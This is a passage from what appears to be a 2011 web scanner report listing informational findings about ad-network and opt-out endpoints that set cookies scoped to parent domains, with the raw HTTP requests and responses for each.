Cookie: clid=2lpgndm01170gl99ih0j0xqn27r0n01h78031203907; ipinfo=2lqzzw60zijasq5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1lpgndmxzt127r0nxzt11lk0exzt11lk0exzt127r0nxzt127l51; rdrlst=40r13j3lpl77b000000167803159ilpl77b0000001678031ax7lqt5nu0000000778030miwlro8in0000000378031j33lroee90000000178010jv8lptjcn0000000k78031cxnlqt5nu0000000778031ay6lroee90000000178010lw4lqt5nu00000007780317gylqt5nu00000007780317gzlroee90000000178010znmlpl77b0000001678031203lq7dnr0000000878031201lptjcn0000000k78030caflpl77b00000016780300c5lpl77b0000001678030p46lptjcn0000000k7803008slroee900000001780117xjlroee9000000017801196mlpl60r0000001b78030h4glptjcn0000000k78031iy2lroee900000001780115xylpl77b00000016780307sylqt5nu00000007780310polpl60i0000001c78030hv0lqt5nu00000007780316d5lroee9000000017801; sglst=41an0fdq0e06ooag00723ag00l1vag00ebdag00bny9b100klag009rsag000thag10ehdag00g12ag00bo0a370bo1ag10kxxag00dsbag00fdn07044mag708ncag70h93ag70ebcag70g0tag700knag70821ag7; vstcnt=41al010r0a458kv131p202203251dj0m14tl11724e2od118e10624fj9y118e10q24ofw7127p10v24ql0810pp10u24t3e9118e10a251dfja145s11723sti11hj10224mij2127p2062072

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: vstcnt=41al010r0a458kv131p202203251dj0m14tl11724e2od118e10624fj9y118e10q24ofw7127p10v24t3e9118e10a24ql0810pp10u23sti11hj102251dfja145s11724mij2127p2062072; Domain=media6degrees.com; Expires=Thu, 15-Mar-2012 16:44:01 GMT; Path=/
Set-Cookie: clid=2lpgndm01170gl99ih0j0xqn27r3r01i78041204908; Domain=media6degrees.com; Expires=Thu, 15-Mar-2012 16:44:01 GMT; Path=/
Set-Cookie: sglst=41an0fdn07044mag708ncag70821ag70h93ag70g0tag70ebcag700knag70fdq0f06ooag00723ag00ag2age0l1vag00ebdag00bny9b100klag009rsag000thag00ehdag00g12ag00bo0a370bo1ag10kxxag00dsbag0; Domain=media6degrees.com; Expires=Thu, 15-Mar-2012 16:44:01 GMT; Path=/
Set-Cookie: rdrlst=40s13j3lpl77b000000177804159ilpl77b0000001778041ax7lqt5nu0000000878040miwlro8in0000000478041j33lroee90000000278020jv8lptjcn0000000l78041cxnlqt5nu0000000878041ay6lroee90000000278020lw4lqt5nu0000000878041194lroehd00000001780117gylqt5nu00000008780417gzlroee90000000278020znmlpl77b0000001778041203lq7dnr0000000978041201lptjcn0000000l78040caflpl77b00000017780400c5lpl77b0000001778040p46lptjcn0000000l7804008slroee900000002780217xjlroee9000000027802196mlpl60r0000001c78040h4glptjcn0000000l78041iy2lroee900000002780215xylpl77b00000017780407sylqt5nu00000008780410polpl60i0000001d78040hv0lqt5nu00000008780416d5lroee9000000027802; Domain=media6degrees.com; Expires=Thu, 15-Mar-2012 16:44:01 GMT; Path=/
Location: http://bh.contextweb.com/bh/rtset?do=add&pid=531399&ev=gl99ih0j0xqn
Content-Length: 0
Date: Sat, 17 Sep 2011 16:44:01 GMT
Connection: close

12.91. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTgwNiZ0bD01MTg0MDA=&piggybackCookie=uid:439524AE8C6B634E021F5F7802166020 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.gather.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; USCC=ONE; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:33:29 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; domain=pubmatic.com; expires=Sat, 06-Sep-2014 14:14:48 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;
12.92. http://img.pulsemgr.com/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.pulsemgr.com
Path:   /optout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout?optout&nocache=0.5253928 HTTP/1.1
Host: img.pulsemgr.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: c=1

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:22:50 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: u=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: b=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: n=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: s=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: f=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: e=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: t=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: c=; domain=.pulsemgr.com; path=/; expires=Sun, 1 Mar 2009 00:00:00 GMT
Set-Cookie: p=OPTOUT; domain=.pulsemgr.com; path=/; expires=Sun, 18 Jan 2038 00:00:00 GMT
P3P: policyref="http://img.pulsemgr.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Location: http://img.pulsemgr.com/optout?oochk&user=OPTOUT
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://img.pulsemgr.com/optout?oochk&amp;user=O
...[SNIP]...
12.93. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&betr=tc=99999&guidm=1:172jmkh17g10rs&bnum=3413 HTTP/1.1
Host: leadback.advertising.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pbid.pro-market.net/engine?site=111778;size=1x1;kw=%20-%20Search%20for%20local%20businesses,%20events,%20and%20coupons%20near%20you;siteref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue;rnd=(1316295499352)
Cookie: ACID=tX790013123977920032; C2=dxMdOB7+Fg5kG/tkCjQ3WXAci+yAeziRSkLuDYRxGhfkAPwuRX890utAT7qxly1IzacphaxAdPiRSEbPFsOlGGiq8MQgkZsET+NB5ydBIlLcEoCxGx7skXAfqaESj5nqGBYm0Wwq9XES; F1=BYpnb5kAAAAA8wEDAQAAgEABAAAABAAAAQAAgEA; BASE=DwATe36lhTYtJcJo1ABrqc7L93fLtd3+rPuylwx9kDBG7U44utasgCF5GADIBrmV9qzSc6vS1VFNbv27ZctOQdzvW1jCW1iqjpSBJWBy9PJ2LmBlN7oYv/UGD8fTZymi5p62qGFtxbh1N7D1juUqtDBKghlDCoK!; ROLL=fvAr20olF+7f08J!; GUID=MTMxNjI3NzM0MTsxOjE3Mmpta2gxN2cxMHJzOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 16:37:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=1yMdOB7+Fg5kG/tkCjQ3WXAci+yAeziRSkLuDYRxGhfkAPwuRX890utAT7qxly1IzacphaxAdPiRSEbPFsOlGGiq8MQgkZsET+NB5ydBIlLcEoCxGx7skXAfqaESj5nqGBYm0Wwq9XES; domain=advertising.com; expires=Mon, 16-Sep-2013 16:37:09 GMT; path=/
Set-Cookie: GUID=MTMxNjI3NzQyOTsxOjE3Mmpta2gxN2cxMHJzOjM2NQ; domain=advertising.com; expires=Mon, 16-Sep-2013 16:37:09 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sat, 17 Sep 2011 17:37:09 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
12.94. http://load.exelator.com/load/OptOut.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/OptOut.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/OptOut.php?service=outNAI&nocache=0.596117 HTTP/1.1
Host: load.exelator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: xltl=eJxdkMFqwzAMht%252FF94AlW5LlntI2Y91C2ZK1223EcQylx7HDGHv3pYFechPi%252B%252FV%252FaIgSf7%252Bii%252BZ02JvNPGE0Fihk9hywWE4lqGCyOGoQUvJZF25O1I%252F3RC4DALBTH2ByOhb1pMKch2xpwnTjAKL5vuTPHq3vmqUMKBogZ9UDIIsC2jV5OO6WEo4muVmCMlVMBStvS6gGRa3GxJhCzuMw3dXabk5dIgiCFZLVzXr%252FceNQotnVTd%252B0D%252F27hevr08%252B53T6f3q7n7Dq%252FNqlfjstKo0F0loGRiFhl%252FpaI2fz9AwjiVPM%253D; BFF=eJzllk2PmzAQhv8Lv8AfgIFckjqqirTQaBOt0r1Ue%252Bx5j9v%252B99rYgQHmNermVOXqZ778wnjmrSl18%252FHeSNFkFynyfl%252FXtcp2vxpplNg5oJus%252B95fvj39%252BPnSnttLtntrapH0KeI5DUNtNQNeSRBZTkFeydHMVlPgjM9K5G1vfwvpaTHQsrqlmCgFagRLHzOSWKsk%252Ba9TrcE61npdJB1tNQUygMMXGqVypLwBcja31pTEO3fH8%252BzOU6kTpUCNYOljRkLtY5rLc59IEyiTxgGQxhEmTdu%252FJNIEyqRxAKRxhElzOF5jmpJJEyiTxoGljxnJIlDXHfdlLQqVE6CHc2ppyM3UXsrK5DW6uaIgn26%252B9ppHXZVBndewmpekK%252BnajP9WHC1n7kooKSjWk%252FOKGdKoSTEsEsOmxLAbYtiUGHZLDJsUw6bFsGtG%252B1v5365C%252Fa2YXzX2d8UIMTRrQt7AGYV8M0N5Y1Qor3eG8t5KgvIOqaG80R3J652RvEOvK%252FTgBIpfgoIRYvDRWN7AGYV8TChvjArl9c5Q3ltJUN4h9YrWTXY8PHX%252BojRqHo4Xhm3%252FlTN0x1y%252BU596f09gmjiA3t9Tvwj03LkruZFp6OfTwzkqCP8Gp2VHzAsqOM29D6s5Dar5WlZufz6zQn12X8JrEdyA%252FmndMcKA1SaS9GqDN5iNZQXvJBvrB94yNhYKvDfAFWFzI3jEwf948%252F2OMf540%252FqOofyfzV4waTfmKh6fcFJuDMZ75l9qzP0FWcbuBw%253D%253D; TFF=eJydlDtyxCAMhu%252ByJ5CEQYCbPUZaFy4yky7pdvbuwS8MNk4kFx6w5%252F%252Bs1w9D7Hx8fUek%252BEDonoTwDCHQox8ixddnxD49TJAW2Lbvkx4nvTnoqV9eS44zJiPSCt2FkrIS3frv8WP8Gn7G479xVbsDkauwzarxH%252F2x6llf15AzWzEpMUWihIChRmaO%252Faaftme9reMs%252BirOynHGZET6dprH1t19HulTmZPFVg0%252Be2ranvXHGvzJISvHGZMS2xyhOfd2ZoVeHIczps2MfNORwLveN%252FRHR876ajYrxxmTEnMk654AZorkr85YcX4XF3Q7h%252Bi5C7fIEAzTHdIFsNSJybrKu5y9yTkxZ4veGI%252Fp3hCjZkcJGjfxFciZkxFptU7Rh%252FkQQ%252BuuWLg%252F9Kp%252BF5y435wxVSRjdRXtetX52jjlKakjqrxecLre75zc6zXHmpktmNSvSa71ESr9irqeccZkxPsXb690Dg%253D%253D; EVX=eJyVkEEOwjAMBP%252FCC7xOHCfuY6wee%252BaI%252BndMSxFBhZabpVmvdz2a2m2y1poMo5XHTMPVUO2CotXVmbJTYhfHZZgML1ppowKnlfJGlREUUpwoeVlp6umyS9ho%252FqBJ3qns7OJJ56VAjQLcFdgNgR9nwgiomltY4cgqxKWRcD4pjoglpOn%252FiP2f%252BKBAqoDifCj9Iu2N5zs3DosS

Response

HTTP/1.1 302 Found
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Cache-Control: no-cache, must-revalidate
Location: http://load.exelator.com/load/OptOut.php?service=verifyNAI
Set-Cookie: DNP=eXelate+OptOut; expires=Tue, 14-Sep-2021 16:48:18 GMT
Set-Cookie: DNP=eXelate+OptOut; expires=Tue, 14-Sep-2021 16:48:18 GMT; path=/; domain=.exelator.com
Set-Cookie: xltl=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT
Set-Cookie: xltl=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT; path=/
Set-Cookie: xltl=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT; path=/; domain=.exelator.com
Set-Cookie: BFF=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT
Set-Cookie: BFF=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT; path=/
Set-Cookie: BFF=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT
Set-Cookie: TFF=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT; path=/
Set-Cookie: TFF=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT
Set-Cookie: EVX=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT; path=/
Set-Cookie: EVX=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Fri, 17-Sep-2010 16:48:17 GMT; path=/; domain=exelator.com
Content-type: text/html
Date: Sat, 17 Sep 2011 16:48:18 GMT
Server: HTTP server
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 AN-AMP_TM uproxy-2
Content-Length: 96

<img src="http://ad.yieldmanager.com/unpixel?id=199372&data=999999&" width="1" height="1"></img>
12.95. http://loadm.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadm.exelator.com
Path:   /load/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /load/?p=204&g=001&bi=CAESELFSW01kQJyVLBKUTkVd3R4&cver=1&j=0 HTTP/1.1
Host: loadm.exelator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9tYXAubWVkaWE2ZGVncmVlcy5jb20vb3Jic2Vydi9oYnBpeD9waXhJZD02MjQ5JnBjdj00NyZwdGlkPTEwMiZ0cHY9MDAmdHB1PTAxNThkNjQ2ODJmMDZiZjg5NzJiMDJjOTg3NTk1NGQ5IiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2QudHVybi5jb20vci9kZC9pZC9MMk56YVdRdk1TOWphV1F2TXpjeE5qa3pNUzkwTHpJL2RwdWlkLzAxNThkNjQ2ODJmMDZiZjg5NzJiMDJjOTg3NTk1NGQ5IiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0wMTU4ZDY0NjgyZjA2YmY4OTcyYjAyYzk4NzU5NTRkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2NtLmcuZG91YmxlY2xpY2submV0L3BpeGVsP25pZD1leGVsYXRlJmo9MCIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9waXhlbC5tYXRodGFnLmNvbS9kYXRhL2ltZz9tdF9pZD0xMDA3MzgmbXRfZGNpZD0zODImdjE9JnYyPSZ2Mz0mczE9JnMyPSZzMyIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2B&h=270f3051e489add843c2c665150bbcc2
Cookie: xltl=eJxdjjELAjEMRv9L94MkbdImTqKCgjgoztJeruAsTuJ%252F9zxwcfuG93hfNbbXw6KF62EbVvMiC4BcXJIU6iCtF83UgEYtmZWT68LNxnr%252FM7xXRJSoqeAUdeyaWLOIVweeqH05RAvPu98uBOm8W2LIFpAjaEIkyYoE%252F%252BThtFkiYqHF%252BQQ7D8KdhgS9DFVJh7EJteI%252B1ul37XierbthJoTMvHp%252FALJ%252BOtY%253D; BFF=eJzllb9OwzAQxt8lT%252BB%252FtR13aXEGIpEg0agqXVBHZkbg3XESNz4nPkeUja7%252B3d1nf8ndXYyQ5vPDUGKKjhLR7sqyZMX23VDFyNYBbormue0en17fjvWh7ortxUiRzdn4c1gGxvIEOIMiVIYiZ3AUxXIIXPCBEVG39ovQnm4GKvVVIlAI2ATmOWoi%252Fq4U6J%252FCXcdof9fTTHSK5RDQEewfYBXtiLwCcBZHc0j8m5vqEL05XDVQCNgE5jlqIjDey3QvbUZmpAkZBxAZRxIydXvMyIw0IeMAIuNIQmZfnbyMTMiMNCHjwDxHTWRWqGmqnSzJhgkA%252BHAOIxV4GdtRqpUosZczCER4%252BTIrrrq4BkxeQh1fiWvq2iz9rVJURumMMEog5iF5wRRo1KwZFjPD5sywK2bYnBl2zQybNcPmzbBLBvub9b%252BdxvqbJX5V3986YcTQrBl7R55wqG9m1F5fFbW3T0btvV4JtXeQRu316Zi9fXLMvm%252FZSLeuH3zLoAvlV9tDEYVsCk%252FymwJfCCuzHx%252FxK9McH9or8xkfw%252BjEXR2w9zhH729c%252FmEq%252Fr%252Fh9wMIK9ZV; TFF=eJydlDtyhDAMQO%252ByJ5Dkj2TTcIy0FBQ7ky7pMnv32CwY%252F8g4FIwNvIckJFi8Iv%252Fz5ZH8A0HPhDA75%252BgxLT7ceHqcwsEEYYFj%252B2p4jLyqeJrep7nHSRszwgr6gqREot2fvX6sn8v3Wj8bd1pVRqrCdKsO0J98XfXGlzWkzHZt1IiRKCigqJOZZTn4uG15U8Z580Wc3eOkjRnhWtUPK00%252F6pwM9mqQNFNx2%252FJ1DdJMyO5x0kaNo4%252FQ7Xs%252Fs4wfjsNJ%252B29mJN2JBD556fD1RG582RuRfCKlnshLY4tk7AygYiS5%252Bsay7xc3T58eorB2t0znFNMd0zowpIfNssq7nrnp2WHPZO9GCYb%252FxrCqTpWg8ye%252BEjl5Y0ZYjR0iX78BIaK%252F; EVX=eJyNjjsKwzAQBe%252FiE%252Bxbab86zOLSdcrgu0dOcCCQQt2DGZi3p%252BbzyIiQsWe7No1HwnODmpcVUy9qXFLYxpH4UqebCoo%252BlG9qjEkhWkSt9KLnO%252BMzg5%252FMfxVw67Eoa5BwX5TnCV090RwwLNnnC388VDQ%253D

Response

HTTP/1.1 302 Found
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: EVX=deleted; expires=Fri, 17-Sep-2010 16:54:48 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Fri, 17-Sep-2010 16:54:48 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJxLtDK0qi62MrBSUrJOBLEzrQysi60MLayUDM2NDOPN440MTOINDAzjzeINlaxrawFAVgzb; expires=Sun, 15-Jan-2012 16:54:49 GMT; path=/; domain=.exelator.com
Location: http://load.s3.amazonaws.com/pixel.gif
Content-Length: 0
Date: Sat, 17 Sep 2011 16:54:49 GMT
Server: HTTP server

12.96. http://nai.btrll.com/nai/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nai.btrll.com
Path:   /nai/optout

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/optout?nocache=0.8178339 HTTP/1.1
Host: nai.btrll.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: BR_MBBV=Ak5Bsatsr1Z1AeV1e6w; DRN1=AGPX0VIEGKsAY9g6TutWQw

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:16:37 GMT
Server: Apache/2.0.63 (Unix)
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=deleted; expires=Fri, 17-Sep-2010 17:16:36 GMT; path=/; domain=.btrll.com
Set-Cookie: BR_MBBV=deleted; expires=Fri, 17-Sep-2010 17:16:36 GMT; path=/
Set-Cookie: DRN1=deleted; expires=Fri, 17-Sep-2010 17:16:36 GMT; path=/; domain=.btrll.com
Set-Cookie: DRN1=deleted; expires=Fri, 17-Sep-2010 17:16:36 GMT; path=/
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: /nai/verify?nocache=0.8178339
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

12.97. http://notrack.adviva.net/CookieCheck.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://notrack.adviva.net
Path:   /CookieCheck.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CookieCheck.php?optThis=1 HTTP/1.1
Host: notrack.adviva.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:20:02 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: ADVIVA=deleted; expires=Fri, 17-Sep-2010 17:20:01 GMT; path=/; domain=.adviva.net
Set-Cookie: ADVIVA=NOTRACK; expires=Thu, 15-Sep-2016 17:20:02 GMT; path=/; domain=.adviva.net
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Location: http://notrack.adviva.net/CookieCheck.php?refreshCheck=1&optThis=1
Content-Length: 0
Connection: close
Content-Type: text/html

12.98. http://notrack.specificclick.net/CookieCheck.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://notrack.specificclick.net
Path:   /CookieCheck.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CookieCheck.php?optThis=1&cdn4=1 HTTP/1.1
Host: notrack.specificclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: ug=UKodabAN_aFXxA

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:23:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: ug=1; expires=Sat, 17-Sep-2011 16:23:10 GMT; path=/; domain=.specificclick.net
Set-Cookie: ADVIVA=1; expires=Sat, 17-Sep-2011 16:23:10 GMT; path=/; domain=.specificclick.net
Set-Cookie: ADVIVA=NOTRACK; expires=Thu, 15-Sep-2016 17:23:10 GMT; path=/; domain=.specificclick.net
P3P: policyref="http://notrack.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Location: http://notrack.specificclick.net/CookieCheck.php?refreshCheck=1&optThis=1&result=
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1

12.99. http://notrack.specificmedia.com/CookieCheck.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://notrack.specificmedia.com
Path:   /CookieCheck.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

